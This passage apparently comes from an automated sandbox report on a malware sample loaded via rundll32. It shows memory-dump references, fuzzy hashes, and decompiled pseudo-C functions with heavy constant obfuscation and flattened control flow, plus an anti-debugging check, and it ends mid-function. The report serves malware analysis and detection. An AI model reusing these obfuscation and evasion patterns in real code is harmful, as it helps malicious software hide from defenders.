                                                                                                                      0x00178c2a
                                                                                                                      0x00178c32
                                                                                                                      0x00178c3a
                                                                                                                      0x00178c3f
                                                                                                                      0x00178c43
                                                                                                                      0x00178c4b
                                                                                                                      0x00178c59
                                                                                                                      0x00178d44
                                                                                                                      0x00000000
                                                                                                                      0x00178c5f
                                                                                                                      0x00178c5f
                                                                                                                      0x00178c61
                                                                                                                      0x00178d7e
                                                                                                                      0x00178d7e
                                                                                                                      0x00178d84
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00178c67
                                                                                                                      0x00178c78
                                                                                                                      0x00178ca5
                                                                                                                      0x00178cac
                                                                                                                      0x00178cb1
                                                                                                                      0x00178cb5
                                                                                                                      0x00178cca
                                                                                                                      0x00178d07
                                                                                                                      0x00178d19
                                                                                                                      0x00178d22
                                                                                                                      0x00178d31
                                                                                                                      0x00178d36
                                                                                                                      0x00178d3b
                                                                                                                      0x00178d3d
                                                                                                                      0x00000000
                                                                                                                      0x00178d3d
                                                                                                                      0x00178d3b
                                                                                                                      0x00178c61
                                                                                                                      0x00178d94
                                                                                                                      0x00178d94
                                                                                                                      0x00178d4b
                                                                                                                      0x00178d56
                                                                                                                      0x00178d5a
                                                                                                                      0x00178d5e
                                                                                                                      0x00178d5f
                                                                                                                      0x00178d61
                                                                                                                      0x00178d6c
                                                                                                                      0x00178d6d
                                                                                                                      0x00178d6f
                                                                                                                      0x00178d6f
                                                                                                                      0x00178d71
                                                                                                                      0x00178d76
                                                                                                                      0x00178d79
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: 12f6af15288137ab8395320d4a41eeea58601aee8cec5df1abd2f05953039872
                                                                                                                      • Instruction ID: bf74148d8f2833b4502b4d94013921590200d9f662f7f31258f44149dc9e2ff7
                                                                                                                      • Opcode Fuzzy Hash: 12f6af15288137ab8395320d4a41eeea58601aee8cec5df1abd2f05953039872
                                                                                                                      • Instruction Fuzzy Hash: E1C1EF725093419FC368CF25C58A94BFBF1FBC4708F008A1DF5A99A260D7B59A19CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001770ED Relevance: 7.7, Strings: 6, Instructions: 219COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E001770ED() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _t202;
				signed int _t203;
				void* _t204;
				intOrPtr _t209;
				intOrPtr _t216;
				void* _t218;
				intOrPtr _t224;
				intOrPtr _t236;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				void* _t246;
				signed int* _t248;
				void* _t251;

				_t248 =  &_v612;
				_v540 = 0xdad4cc;
				_v540 = _v540 ^ 0x94191629;
				_t218 = 0x6f2f9f8;
				_v540 = _v540 ^ 0x94c3c2f9;
				_v544 = 0x76e0f0;
				_v544 = _v544 << 0x10;
				_v544 = _v544 ^ 0xe0f00029;
				_v536 = 0x3bc67a;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x000f0383;
				_v568 = 0x8bde3b;
				_v568 = _v568 + 0xffff2322;
				_v568 = _v568 ^ 0x008d993e;
				_v596 = 0x92619;
				_v596 = _v596 ^ 0xd159791b;
				_v596 = _v596 + 0xffff3449;
				_v596 = _v596 | 0x988058a4;
				_v596 = _v596 ^ 0xd9ccc0e1;
				_v608 = 0xa06713;
				_t241 = 0x29;
				_v608 = _v608 / _t241;
				_v608 = _v608 ^ 0x6a345d45;
				_t246 = 0;
				_v608 = _v608 << 0xe;
				_v608 = _v608 ^ 0xed3298df;
				_v576 = 0x1c835f;
				_v576 = _v576 ^ 0xdf607740;
				_v576 = _v576 >> 0xb;
				_v576 = _v576 ^ 0x0012ec93;
				_v584 = 0x7ddda5;
				_t242 = 0x76;
				_v584 = _v584 / _t242;
				_v584 = _v584 | 0x464a7126;
				_v584 = _v584 ^ 0x4642215f;
				_v548 = 0x20374d;
				_t243 = 0x71;
				_v548 = _v548 * 0x6c;
				_v548 = _v548 ^ 0x0d9d239d;
				_v528 = 0x9116;
				_v528 = _v528 ^ 0x0b2a50da;
				_v528 = _v528 ^ 0x0b2b7a92;
				_v600 = 0xee9b3a;
				_v600 = _v600 | 0x1ae7cac3;
				_v600 = _v600 + 0x2aec;
				_v600 = _v600 | 0xe5d5fb71;
				_v600 = _v600 ^ 0xfffe899a;
				_v556 = 0x2fd7b1;
				_v556 = _v556 / _t243;
				_v556 = _v556 ^ 0x0001ae08;
				_v552 = 0xd06bd7;
				_v552 = _v552 + 0x9aba;
				_v552 = _v552 ^ 0x00dba68b;
				_v560 = 0x3f6698;
				_v560 = _v560 ^ 0x9e976c20;
				_v560 = _v560 ^ 0x9ea088a0;
				_v564 = 0xf04caf;
				_v564 = _v564 << 0xc;
				_v564 = _v564 ^ 0x04c86801;
				_v532 = 0x4abe1e;
				_v532 = _v532 + 0xffff7e54;
				_v532 = _v532 ^ 0x0047677c;
				_v592 = 0xfc3d76;
				_v592 = _v592 >> 4;
				_t244 = 0x67;
				_t245 = _v524;
				_v592 = _v592 / _t244;
				_v592 = _v592 ^ 0x0e63bcd1;
				_v592 = _v592 ^ 0x0e6c0c0a;
				_v580 = 0x87074e;
				_v580 = _v580 + 0x3b8f;
				_v580 = _v580 + 0xffffa265;
				_v580 = _v580 ^ 0x008cb1a6;
				_v588 = 0xe717aa;
				_v588 = _v588 | 0xfff18f7b;
				_v588 = _v588 >> 0xb;
				_v588 = _v588 ^ 0x001226f1;
				_v604 = 0x61f630;
				_v604 = _v604 | 0xec5f2186;
				_v604 = _v604 ^ 0x97c62f9e;
				_v604 = _v604 ^ 0x80f94e8c;
				_v604 = _v604 ^ 0xfb4d53d4;
				_v612 = 0x890e92;
				_v612 = _v612 >> 9;
				_v612 = _v612 + 0xf9d4;
				_v612 = _v612 + 0xffff7e3c;
				_v612 = _v612 ^ 0x000167a4;
				_v572 = 0xa3f922;
				_v572 = _v572 << 1;
				_v572 = _v572 + 0x9b39;
				_v572 = _v572 ^ 0x014464a5;
				goto L1;
				do {
					while(1) {
						L1:
						_t251 = _t218 - 0xaf66d96;
						if(_t251 > 0) {
							break;
						}
						if(_t251 == 0) {
							_push(_t218);
							_t236 =  *0x19520c; // 0x0
							_t203 = E0017EA7B(_t236 + 8, _v552, _v524, _t218, _v560, _v564, _v532);
							_t248 =  &(_t248[7]);
							_t218 = 0xbcbad55;
							__eflags = _t203;
							_t204 = 1;
							_t246 =  ==  ? _t204 : _t246;
							continue;
						}
						if(_t218 == 0x1700698) {
							E0018E689(_v548, _v528, _v600, _t245, _v556);
							_t248 =  &(_t248[3]);
							L9:
							_t218 = 0xaf66d96;
							continue;
						}
						if(_t218 == 0x4f7449d) {
							_v524 = _v540;
							goto L9;
						}
						if(_t218 == 0x51416c3) {
							E001912A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
							_t209 = E00177677( &_v520, _v604, _v612, _v572);
							_t224 =  *0x19520c; // 0x0
							 *((intOrPtr*)(_t224 + 4)) = _t209;
							L23:
							return _t246;
						}
						if(_t218 != 0x6f2f9f8) {
							goto L20;
						}
						_push(_t218);
						_push(_t218);
						 *0x19520c = E00183512(0x444);
						_t218 = 0xcc58939;
					}
					__eflags = _t218 - 0xbcbad55;
					if(_t218 == 0xbcbad55) {
						E0017E86A();
						_t218 = 0x51416c3;
						goto L20;
					}
					__eflags = _t218 - 0xcc58939;
					if(_t218 == 0xcc58939) {
						_t202 = E0017EB36(_v576, _v584, _t218, _v536);
						_t245 = _t202;
						_t248 =  &(_t248[3]);
						__eflags = _t202;
						if(__eflags == 0) {
							_t218 = 0x4f7449d;
						} else {
							_t216 =  *0x19520c; // 0x0
							 *((intOrPtr*)(_t216 + 0x438)) = 1;
							_t218 = 0xdbc7fda;
						}
						goto L1;
					}
					__eflags = _t218 - 0xdbc7fda;
					if(__eflags != 0) {
						goto L20;
					}
					_t218 = 0x1700698;
					_v524 = _v544;
					goto L1;
					L20:
					__eflags = _t218 - 0xee3620e;
				} while (__eflags != 0);
				goto L23;
			}










































                                                                                                                      0x001770ed
                                                                                                                      0x001770f3
                                                                                                                      0x001770fd
                                                                                                                      0x00177105
                                                                                                                      0x0017710a
                                                                                                                      0x00177112
                                                                                                                      0x0017711a
                                                                                                                      0x0017711f
                                                                                                                      0x00177127
                                                                                                                      0x0017712f
                                                                                                                      0x00177134
                                                                                                                      0x0017713c
                                                                                                                      0x00177144
                                                                                                                      0x0017714c
                                                                                                                      0x00177154
                                                                                                                      0x0017715c
                                                                                                                      0x00177164
                                                                                                                      0x0017716c
                                                                                                                      0x00177174
                                                                                                                      0x0017717c
                                                                                                                      0x0017718e
                                                                                                                      0x00177193
                                                                                                                      0x00177199
                                                                                                                      0x001771a1
                                                                                                                      0x001771a3
                                                                                                                      0x001771a8
                                                                                                                      0x001771b0
                                                                                                                      0x001771b8
                                                                                                                      0x001771c0
                                                                                                                      0x001771c5
                                                                                                                      0x001771cd
                                                                                                                      0x001771d9
                                                                                                                      0x001771de
                                                                                                                      0x001771e4
                                                                                                                      0x001771ec
                                                                                                                      0x001771f4
                                                                                                                      0x00177201
                                                                                                                      0x00177202
                                                                                                                      0x00177206
                                                                                                                      0x0017720e
                                                                                                                      0x00177216
                                                                                                                      0x0017721e
                                                                                                                      0x00177226
                                                                                                                      0x0017722e
                                                                                                                      0x00177236
                                                                                                                      0x0017723e
                                                                                                                      0x00177246
                                                                                                                      0x0017724e
                                                                                                                      0x0017725c
                                                                                                                      0x00177260
                                                                                                                      0x00177268
                                                                                                                      0x00177270
                                                                                                                      0x00177278
                                                                                                                      0x00177280
                                                                                                                      0x00177288
                                                                                                                      0x00177290
                                                                                                                      0x00177298
                                                                                                                      0x001772a0
                                                                                                                      0x001772a5
                                                                                                                      0x001772ad
                                                                                                                      0x001772b5
                                                                                                                      0x001772bd
                                                                                                                      0x001772c5
                                                                                                                      0x001772cd
                                                                                                                      0x001772df
                                                                                                                      0x001772e2
                                                                                                                      0x001772eb
                                                                                                                      0x001772ef
                                                                                                                      0x001772f7
                                                                                                                      0x001772ff
                                                                                                                      0x00177307
                                                                                                                      0x0017730f
                                                                                                                      0x00177317
                                                                                                                      0x0017731f
                                                                                                                      0x00177327
                                                                                                                      0x0017732f
                                                                                                                      0x00177334
                                                                                                                      0x0017733c
                                                                                                                      0x00177344
                                                                                                                      0x0017734c
                                                                                                                      0x00177354
                                                                                                                      0x0017735c
                                                                                                                      0x00177364
                                                                                                                      0x0017736c
                                                                                                                      0x00177371
                                                                                                                      0x00177379
                                                                                                                      0x00177381
                                                                                                                      0x00177389
                                                                                                                      0x00177391
                                                                                                                      0x00177395
                                                                                                                      0x0017739d
                                                                                                                      0x0017739d
                                                                                                                      0x001773a5
                                                                                                                      0x001773a5
                                                                                                                      0x001773a5
                                                                                                                      0x001773a5
                                                                                                                      0x001773a7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001773ad
                                                                                                                      0x00177420
                                                                                                                      0x00177436
                                                                                                                      0x0017743f
                                                                                                                      0x00177444
                                                                                                                      0x00177447
                                                                                                                      0x0017744c
                                                                                                                      0x00177450
                                                                                                                      0x00177451
                                                                                                                      0x00000000
                                                                                                                      0x00177451
                                                                                                                      0x001773b5
                                                                                                                      0x00177416
                                                                                                                      0x0017741b
                                                                                                                      0x00177401
                                                                                                                      0x00177401
                                                                                                                      0x00000000
                                                                                                                      0x00177401
                                                                                                                      0x001773b9
                                                                                                                      0x001773fd
                                                                                                                      0x00000000
                                                                                                                      0x001773fd
                                                                                                                      0x001773c1
                                                                                                                      0x001774e6
                                                                                                                      0x001774fb
                                                                                                                      0x00177500
                                                                                                                      0x00177509
                                                                                                                      0x0017750d
                                                                                                                      0x00177518
                                                                                                                      0x00177518
                                                                                                                      0x001773cd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001773df
                                                                                                                      0x001773e0
                                                                                                                      0x001773ed
                                                                                                                      0x001773f2
                                                                                                                      0x001773f2
                                                                                                                      0x00177459
                                                                                                                      0x0017745f
                                                                                                                      0x001774bd
                                                                                                                      0x001774c2
                                                                                                                      0x00000000
                                                                                                                      0x001774c2
                                                                                                                      0x00177461
                                                                                                                      0x00177467
                                                                                                                      0x00177490
                                                                                                                      0x00177495
                                                                                                                      0x00177497
                                                                                                                      0x0017749a
                                                                                                                      0x0017749c
                                                                                                                      0x001774b6
                                                                                                                      0x0017749e
                                                                                                                      0x0017749e
                                                                                                                      0x001774a6
                                                                                                                      0x001774ac
                                                                                                                      0x001774ac
                                                                                                                      0x00000000
                                                                                                                      0x0017749c
                                                                                                                      0x00177469
                                                                                                                      0x0017746f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00177475
                                                                                                                      0x0017747a
                                                                                                                      0x00000000
                                                                                                                      0x001774c7
                                                                                                                      0x001774c7
                                                                                                                      0x001774c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: 276c008d1d8b7a0b29edefbbbbca22cfdb987e9d832aeab62bf6dea0547d93f8
                                                                                                                      • Instruction ID: ced1676f5b9d662ba395e37c986903006056f23467e90848dcf60b3bd67e0b05
                                                                                                                      • Opcode Fuzzy Hash: 276c008d1d8b7a0b29edefbbbbca22cfdb987e9d832aeab62bf6dea0547d93f8
                                                                                                                      • Instruction Fuzzy Hash: 0BA1217150C3819FD768CF24D58A82BBBF2FBC5758F20891DF69A86260D3B18949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00185040 Relevance: 7.7, Strings: 6, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00185040(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t222;
				signed int _t224;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t261;
				void* _t262;
				signed int* _t264;
				signed int* _t265;

				_t264 =  &_v80;
				_v64 = 0xca2d1a;
				_v64 = _v64 + 0xffff463a;
				_v64 = _v64 + 0xffffa2b5;
				_v64 = _v64 + 0xffffe441;
				_v64 = _v64 ^ 0x00ce8887;
				_v68 = 0xe757b6;
				_t261 = __edx;
				_t227 = __ecx;
				_t262 = 0xd46e588;
				_t229 = 0x7b;
				_v68 = _v68 / _t229;
				_v68 = _v68 | 0x2f3c6c23;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0xe7b70971;
				_v72 = 0xa66d67;
				_v72 = _v72 + 0xffff9e81;
				_v72 = _v72 + 0xffffa01d;
				_v72 = _v72 + 0xd858;
				_v72 = _v72 ^ 0x00aeb203;
				_v76 = 0xda65d9;
				_v76 = _v76 | 0x06c15440;
				_v76 = _v76 + 0x3ac0;
				_t230 = 0x31;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x9dbea6d5;
				_v28 = 0xef7021;
				_v28 = _v28 + 0xc1df;
				_v28 = _v28 ^ 0x38dac4ec;
				_v28 = _v28 ^ 0x38291ca9;
				_v56 = 0xd77e5;
				_v56 = _v56 | 0x9f6ff94e;
				_v56 = _v56 / _t230;
				_v56 = _v56 ^ 0x034debba;
				_v32 = 0x5c0433;
				_t231 = 0x4c;
				_v32 = _v32 / _t231;
				_t232 = 0x38;
				_v32 = _v32 * 9;
				_v32 = _v32 ^ 0x000ec3b0;
				_v60 = 0x6ca766;
				_v60 = _v60 + 0x1f13;
				_v60 = _v60 * 0x1b;
				_v60 = _v60 << 0xb;
				_v60 = _v60 ^ 0xc778512f;
				_v12 = 0x6aa94;
				_v12 = _v12 + 0x5212;
				_v12 = _v12 ^ 0x000734b5;
				_v48 = 0xd6268c;
				_v48 = _v48 / _t232;
				_t233 = 0x26;
				_v48 = _v48 / _t233;
				_v48 = _v48 + 0x646;
				_v48 = _v48 ^ 0x000e3e3b;
				_v52 = 0x57df31;
				_t234 = 0x5e;
				_v52 = _v52 / _t234;
				_v52 = _v52 >> 4;
				_v52 = _v52 << 0x10;
				_v52 = _v52 ^ 0x0ef79a5c;
				_v8 = 0x5569b0;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x000ef288;
				_v44 = 0x5fa9ce;
				_v44 = _v44 + 0xffff7bdd;
				_v44 = _v44 << 1;
				_t235 = 0x65;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x000c777c;
				_v36 = 0x515ebf;
				_v36 = _v36 | 0x64797e59;
				_v36 = _v36 ^ 0x4915d5d4;
				_v36 = _v36 ^ 0x2d62d183;
				_v16 = 0xf90c33;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 ^ 0x1c3bb4ce;
				_v80 = 0x303e6a;
				_v80 = _v80 + 0xaf21;
				_v80 = _v80 ^ 0x45872c25;
				_v80 = _v80 + 0xffff3867;
				_v80 = _v80 ^ 0x45bdee21;
				_v20 = 0xb8b4ba;
				_v20 = _v20 + 0x3a99;
				_v20 = _v20 ^ 0x00b083c3;
				_v40 = 0xb582c8;
				_v40 = _v40 + 0x432d;
				_v40 = _v40 | 0xfff7ef9a;
				_v40 = _v40 ^ 0xfff9a351;
				_v24 = 0x3e85d;
				_v24 = _v24 * 0x1b;
				_v24 = _v24 + 0xffffd227;
				_v24 = _v24 ^ 0x006c1bcc;
				_v4 = 0x28c504;
				_v4 = _v4 + 0xffffee75;
				_v4 = _v4 ^ 0x002a9648;
				do {
					while(_t262 != 0x8d90b87) {
						if(_t262 == 0x991fac7) {
							return E0017F88A(_v40, _v24, _v4,  *(_t261 + 0x30));
						}
						if(_t262 == 0xa3f1429) {
							_push(_t235);
							_t224 = E00188D71(_v64, _v68, __eflags, _v72, _v76, _t227);
							_t265 =  &(_t264[4]);
							 *(_t261 + 0x30) = _t224;
							__eflags = _t224;
							if(_t224 != 0) {
								E0017EE05(_v56, _v32, _v60, _t224, _t224);
								_t235 =  *(_t261 + 0x30);
								E0018E713(_t235, _v12, _v48, _v52);
								_t264 =  &(_t265[6]);
								_t262 = 0x8d90b87;
								continue;
							}
						} else {
							if(_t262 == 0xd46e588) {
								_t262 = 0xa3f1429;
								continue;
							} else {
								if(_t262 != 0xf9322b8) {
									goto L14;
								} else {
									_t235 = E00172F34;
									_t224 = E00184EFF(E00172F34, _v36, E00172F34, E00172F34, _v16, _v80, E00172F34, _v20, _t261);
									_t264 =  &(_t264[8]);
									 *(_t261 + 0x24) = _t224;
									if(_t224 == 0) {
										_t262 = 0x991fac7;
										continue;
									}
								}
							}
						}
						return _t224;
						L18:
					}
					_t235 = _v8;
					_t222 = E00182BDE(_t235,  *(_t261 + 0x30), _v44);
					_t264 =  &(_t264[1]);
					 *(_t261 + 0xc) = _t222;
					__eflags = _t222;
					if(__eflags == 0) {
						_t262 = 0x991fac7;
						goto L14;
					} else {
						_t262 = 0xf9322b8;
						continue;
					}
					goto L18;
					L14:
					__eflags = _t262 - 0x74fce14;
				} while (__eflags != 0);
				return _t224;
			}





































                                                                                                                      0x00185040
                                                                                                                      0x00185043
                                                                                                                      0x0018504b
                                                                                                                      0x00185053
                                                                                                                      0x0018505b
                                                                                                                      0x00185063
                                                                                                                      0x0018506b
                                                                                                                      0x0018507b
                                                                                                                      0x0018507d
                                                                                                                      0x00185083
                                                                                                                      0x00185088
                                                                                                                      0x0018508d
                                                                                                                      0x00185093
                                                                                                                      0x0018509b
                                                                                                                      0x001850a0
                                                                                                                      0x001850a8
                                                                                                                      0x001850b0
                                                                                                                      0x001850b8
                                                                                                                      0x001850c0
                                                                                                                      0x001850c8
                                                                                                                      0x001850d0
                                                                                                                      0x001850d8
                                                                                                                      0x001850e0
                                                                                                                      0x001850ed
                                                                                                                      0x001850f0
                                                                                                                      0x001850f4
                                                                                                                      0x001850fc
                                                                                                                      0x00185104
                                                                                                                      0x0018510c
                                                                                                                      0x00185114
                                                                                                                      0x0018511c
                                                                                                                      0x00185124
                                                                                                                      0x00185134
                                                                                                                      0x00185138
                                                                                                                      0x00185140
                                                                                                                      0x0018514c
                                                                                                                      0x00185151
                                                                                                                      0x0018515c
                                                                                                                      0x0018515f
                                                                                                                      0x00185163
                                                                                                                      0x0018516b
                                                                                                                      0x00185173
                                                                                                                      0x00185180
                                                                                                                      0x00185184
                                                                                                                      0x00185189
                                                                                                                      0x00185191
                                                                                                                      0x00185199
                                                                                                                      0x001851a1
                                                                                                                      0x001851a9
                                                                                                                      0x001851b9
                                                                                                                      0x001851c1
                                                                                                                      0x001851c4
                                                                                                                      0x001851c8
                                                                                                                      0x001851d0
                                                                                                                      0x001851d8
                                                                                                                      0x001851e8
                                                                                                                      0x001851ed
                                                                                                                      0x001851f3
                                                                                                                      0x001851fd
                                                                                                                      0x00185202
                                                                                                                      0x0018520a
                                                                                                                      0x00185212
                                                                                                                      0x00185217
                                                                                                                      0x0018521f
                                                                                                                      0x00185227
                                                                                                                      0x0018522f
                                                                                                                      0x00185237
                                                                                                                      0x0018523a
                                                                                                                      0x0018523e
                                                                                                                      0x00185246
                                                                                                                      0x0018524e
                                                                                                                      0x00185256
                                                                                                                      0x0018525e
                                                                                                                      0x00185266
                                                                                                                      0x00185273
                                                                                                                      0x00185277
                                                                                                                      0x0018527f
                                                                                                                      0x00185287
                                                                                                                      0x0018528f
                                                                                                                      0x00185297
                                                                                                                      0x0018529f
                                                                                                                      0x001852a7
                                                                                                                      0x001852af
                                                                                                                      0x001852b7
                                                                                                                      0x001852bf
                                                                                                                      0x001852c7
                                                                                                                      0x001852cf
                                                                                                                      0x001852d7
                                                                                                                      0x001852df
                                                                                                                      0x001852ec
                                                                                                                      0x001852f0
                                                                                                                      0x001852f8
                                                                                                                      0x00185300
                                                                                                                      0x00185308
                                                                                                                      0x00185310
                                                                                                                      0x00185318
                                                                                                                      0x00185318
                                                                                                                      0x00185326
                                                                                                                      0x00000000
                                                                                                                      0x00185425
                                                                                                                      0x00185332
                                                                                                                      0x0018537f
                                                                                                                      0x00185391
                                                                                                                      0x00185396
                                                                                                                      0x00185399
                                                                                                                      0x0018539c
                                                                                                                      0x0018539e
                                                                                                                      0x001853b6
                                                                                                                      0x001853c7
                                                                                                                      0x001853ca
                                                                                                                      0x001853cf
                                                                                                                      0x001853d2
                                                                                                                      0x00000000
                                                                                                                      0x001853d2
                                                                                                                      0x00185334
                                                                                                                      0x0018533a
                                                                                                                      0x00185378
                                                                                                                      0x00000000
                                                                                                                      0x0018533c
                                                                                                                      0x00185342
                                                                                                                      0x00000000
                                                                                                                      0x00185348
                                                                                                                      0x0018535c
                                                                                                                      0x00185361
                                                                                                                      0x00185366
                                                                                                                      0x00185369
                                                                                                                      0x0018536e
                                                                                                                      0x00185374
                                                                                                                      0x00000000
                                                                                                                      0x00185374
                                                                                                                      0x0018536e
                                                                                                                      0x00185342
                                                                                                                      0x0018533a
                                                                                                                      0x0018542d
                                                                                                                      0x00000000
                                                                                                                      0x0018542d
                                                                                                                      0x001853e3
                                                                                                                      0x001853e7
                                                                                                                      0x001853ec
                                                                                                                      0x001853ef
                                                                                                                      0x001853f2
                                                                                                                      0x001853f4
                                                                                                                      0x00185400
                                                                                                                      0x00000000
                                                                                                                      0x001853f6
                                                                                                                      0x001853f6
                                                                                                                      0x00000000
                                                                                                                      0x001853f6
                                                                                                                      0x00000000
                                                                                                                      0x00185402
                                                                                                                      0x00185402
                                                                                                                      0x00185402
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !p$#l</$-C$Y~yd$j>0$w
                                                                                                                      • API String ID: 0-1896768906
                                                                                                                      • Opcode ID: fa5727b88ca72abd79281b54500e12f094f20970752ecc2ef75d14e4d2ff21ce
                                                                                                                      • Instruction ID: eaa040d4e2dda195f0d3f73e29893f4272208e8e86f14c666fc0a3d24910c464
                                                                                                                      • Opcode Fuzzy Hash: fa5727b88ca72abd79281b54500e12f094f20970752ecc2ef75d14e4d2ff21ce
                                                                                                                      • Instruction Fuzzy Hash: DDA16471908741AFD358DF24C48941BFBF2FBC4398F409A1DF59696260E7B58A498F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002F81E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2579439406-0
                                                                                                                      • Opcode ID: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction ID: 507c20c1e61512489ef28f25289f4d37d9bc9ee57db3d69d2177bc050be51aa9
                                                                                                                      • Opcode Fuzzy Hash: a3b530651e130d006cdad9593b6537dae4cc17848e5dd1109e30e69b3ede4491
                                                                                                                      • Instruction Fuzzy Hash: 3D21FFB4801320CFFB11DF28EDC56483BA4FB88315F10206AE50D87A71EBB16680AF56
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00182BF6 Relevance: 6.7, Strings: 5, Instructions: 409COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00182BF6() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
